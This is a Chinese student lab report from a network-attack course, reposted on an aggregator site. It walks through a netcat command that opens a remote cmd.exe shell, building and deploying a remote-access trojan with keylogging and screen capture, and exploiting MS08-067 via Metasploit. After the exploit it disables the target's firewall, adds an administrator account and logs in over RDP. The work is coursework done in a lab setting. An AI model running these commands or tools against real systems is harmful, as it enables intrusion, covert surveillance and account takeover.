日韩性视频-久久久蜜桃-www中文字幕-在线中文字幕av-亚洲欧美一区二区三区四区-撸久久-香蕉视频一区-久久无码精品丰满人妻-国产高潮av-激情福利社-日韩av网址大全-国产精品久久999-日本五十路在线-性欧美在线-久久99精品波多结衣一区-男女午夜免费视频-黑人极品ⅴideos精品欧美棵-人人妻人人澡人人爽精品欧美一区-日韩一区在线看-欧美a级在线免费观看

歡迎訪問 生活随笔!

生活随笔

當前位置: 首頁 > 编程资源 > 编程问答 >内容正文

编程问答

实验报告4

發布時間:2025/5/22 编程问答 25 豆豆
生活随笔 收集整理的這篇文章主要介紹了 实验报告4 小編覺得挺不錯的,現在分享給大家,幫大家做個參考.

學???號201421430023

?

中國人民公安大學

Chinese people’?public security university

?

網絡對抗技術

實驗報告

?

實驗四

惡意代碼技術

?

?

?

學生姓名

?陸圣宇

年級

?2014

區隊

?三

指導教師

?高見

?

?

信息技術與網絡安全學院

2016117

?

實驗任務總綱

2016—2017?學年???學期

一、實驗目的

1.通過對木馬的練習,使讀者理解和掌握木馬傳播和運行的機制;通過手動刪除木馬,掌握檢查木馬和刪除木馬的技巧,學會防御木馬的相關知識,加深對木馬的安全防范意識。

?

2.了解并熟悉常用的網絡攻擊工具,木馬的基本功能;

3.達到鞏固課程知識和實際應用的目的。

二、實驗要求

1.認真閱讀每個實驗內容,需要截圖的題目,需清晰截圖并對截圖進行標注和說明。

2.文檔要求結構清晰,圖文表達準確,標注規范。推理內容客觀、合理、邏輯性強。

3.軟件工具可使用NC、MSF等。

4.實驗結束后,保留電子文檔。

三、實驗步驟

1.準備

提前做好實驗準備,實驗前應把詳細了解實驗目的、實驗要求和實驗內容,熟悉并準備好實驗用的軟件工具,按照實驗內容和要求提前做好實驗內容的準備。

2.實驗環境

描述實驗所使用的硬件和軟件環境(包括各種軟件工具);

開機并啟動軟件office2003或2007、瀏覽器、加解密軟件。

3.實驗過程

1)啟動系統和啟動工具軟件環境。

2)用軟件工具實現實驗內容。

4.實驗報告

按照統一要求的實驗報告格式書寫實驗報告。把按照模板格式編寫的文檔嵌入到實驗報告文檔中,文檔按照規定的書寫格式書寫,表格要有表說圖形要有圖說。

?

任務一 利用NC控制電腦

?

?NetCat,具有網絡軍刀之稱,它小巧精悍且功能強大,說它小巧精悍,是因為他的軟件大小現在已經壓縮到只有十幾KB,而且在功能上絲毫不減。

?

實驗過程需要兩個同學相互配合完成:

?

步驟一:

?

???在受害者的機器 (同學A)
輸入下面的命令:
  nc.exe?-l -p port -e cmd.exe ??進入監聽模式

?

?


?


步驟二:
  在攻擊者的機器.(同學B)
輸入下面的命令:
  nc ip??port //連接victim_IP,然后得到一個shell。?(需要截圖)

?

?

?

步驟三:

?

????在shell中,利用net user?用戶名 密碼?/add?,添加一個用戶,并在受害者的機器中使用?net user?命令進行驗證。(需要截圖)

?

?

?

?可以繼續通過命令行做一些事情。

?

任務二 利用木馬控制電腦

?

實驗過程需要兩個同學配合:

?

步驟一:

?

??? 攻擊者的機器. (同學A)
打開V2014.exe程序或則star RAT,這兩個木馬功能類似。

?

?

?

?


步驟二:
  點擊菜單欄中的“服務生成”,在彈出的配置服務端中,配置回IP地址(攻擊者IP)和端口號,并點擊“生成”按鈕,生成木馬服務端。

?

?

?

?

?

步驟三:

?

將生成的木馬可執行程序拷貝到受害者的機器,并雙擊運行。?

?

步驟四:

?

在控制端中查看木馬上線情況,并對以下功能每個進行測試和截圖。?

?

  • 文件管理,嘗試拷貝文件
  • ?

    ?

  • 屏幕控制,嘗試獲取桌面
  • ?

    ?

  • 鍵盤記錄,嘗試獲取對方擊鍵記錄
  • ?

    ?

  • 會話管理,重啟對方機器,查看是否能自啟動上線
  • ?


    會話管理,卸載對方的木馬。

    ?

    ?

    任務三 通過漏洞獲取shell(合天平臺中做?所有過程截圖寫博客

    ?windows ms08067 漏洞利用

    在平臺中獲取shell之后,繼續利用攻擊機器使用

    net user user pass /add

    net localgroup administrators /add

    命令向被攻擊的機器中添加賬戶,并提升為管理員

    然后用rdesktop 10.1.1.130 登陸對方的遠程桌面

    查看XPSP3漏洞主機的登錄用戶及網絡配置信息,從下圖2可以看出漏洞主機IP為10.1.1.130。使用命令如下:?

    ?????? ipconfig?查看網絡配置信息?

    ??????

    ?

    ???????????????????????? 圖2?查詢漏洞主機信息

    ????? 為了更好的演示攻擊xp系統實例需要關閉XP系統的防火墻,win+R輸入cmd

    ?? ?? 運行命令:netsh firewall set opmode mode=disable

    ???????

    ?

    ???????? ? ?? ?? 圖3?關閉目標主機防火墻

    ??????查看攻擊者主機登陸用戶及網絡配置信息,從下圖3可以看出攻擊主機登陸用戶為root,IP為10.1.1.128?

    ????? whoami??查看當前登陸用戶

    ????? ifconfig?查看網絡配置信息?

    ???????

    ?

    ??????????? ?? 圖4?查詢攻擊主機信息

    ??????Metasploit默認使用PostgreSQL存儲滲透測試所需的數據表,所以在啟動Armitage之前需要首先啟動PostgreSQL服務和Metasploit服務,然后再啟動armitage,彈出對話框詢問是否連接Metasploit的RPC信道,依次選擇“connect”、“是”選項。Armitage啟動成功后主界面如下圖7所示:

    ????? service?postgresql?start?啟動PostgreSQL服務

    ????? service metasploit?start?在另一個終端啟動Metasploit服務

    ????? armitage?啟動Armitage

    ???????

    ?

    ????????? ? ? ? ?? ?? 圖5?啟動Armitage(一)

    ???????

    ?

    ????? ? ? ? ?? ?? 圖6 啟動Armitage(二)

    ???????

    ?

    ???? ?? ? ?? ?? 圖7?Armitage初始界面

    掃描目標網段完整信息,確認目標網絡拓撲結構是網絡偵查的重要實施方法。依次選擇Host-Nmap?Scan-Quick?Scan(OS?detect),彈出對話框填寫目標主機所在的10.1.1.0/24。?掃描結果如圖3所示,10.1.1.0/24網段一共還存在三臺主機,其中10.1.1.130是所重點關注的目標主機。

    ???????

    ?

    ??????????????? ?? 圖8?Armitage掃描目標網段

    ???????

    ?

    ?????????? ? ?? ?? 圖9?Armitage完成目標網段掃描

    ??????查看目標主機上開啟的服務,選中目標主機10.1.1.130,右鍵選擇Services。

    ???????

    ?

    ??????? ?? ?? 圖10?目標主機開啟的服務信息

    ??????定向掃描目標主機,尋找存在的漏洞,為下一步確定攻擊方法提供參考依據。選中目標主機10.1.1.130,右鍵選擇Scan,Armitage會調用Metasploit的漏洞掃描模塊,對10.1.1.130進行漏洞掃描。

    ???????

    ?

    ???????????? ?? 圖11?定向掃描目標主機漏洞

    ??????利用第3步中掃描探測得到的漏洞信息,自動搜索Metasploit攻擊模塊庫,尋找合適的攻擊模塊。選中10.1.1.130主機,依次選擇菜單欄Attacks-Find?Attacks,Armitage會開始自動搜索尋找合適的攻擊模塊。

    ???????

    ?

    ???????????? ?? 圖12?自動搜索攻擊模塊

    完成對目標主機的攻擊模塊搜索以后,選中10.1.1.130主機右鍵可以發現多了Attack菜單。這里選擇SMB漏洞對XP目標主機進行攻擊,依次選擇Attack》smb》ms08_067_netapi菜單。

    ???????

    ?

    ?????????????????????????????? ? ? ? ? ? ? ? ? ? ? ? ? ?? ?? 圖13?選擇ms08_067漏洞攻擊xp

    ??????在彈出的攻擊配置對話框中Targets處配置目標主機的系統,10.1.1.130主機是簡體中文版xp系統,故選擇41=>Windows?XP?SP3?Chinese-Simplified{NX)

    ???????

    ?

    ?????????????????????????????? ? ? ? ? ? ? ? ? ? ? ? ? ?? ?? 圖14?配置攻擊信息

    ??????攻擊完成后,目標主機的圖標會發生明顯變化,Armitage會自動建立一個駐留在內存的shellcode?也就是Meterpreter,右鍵打開Meterpreter?shell,輸入getuid命令查看當前用戶的權限是SYSTEM權限,攻擊完成。

    ???????

    ?

    ?????????????????????????????? ? ? ? ? ? ? ? ? ? ? ? ? ?? ?? 圖15?查看攻擊者擁有的權限

    添加賬戶blcmonkey 密碼123 并提升為管理員

    ?

    ?

    ?

    利用遠程桌面登陸

    ?

    轉載于:https://www.cnblogs.com/P201421430023/p/7751868.html

    總結

    以上是生活随笔為你收集整理的实验报告4的全部內容,希望文章能夠幫你解決所遇到的問題。

    如果覺得生活随笔網站內容還不錯,歡迎將生活随笔推薦給好友。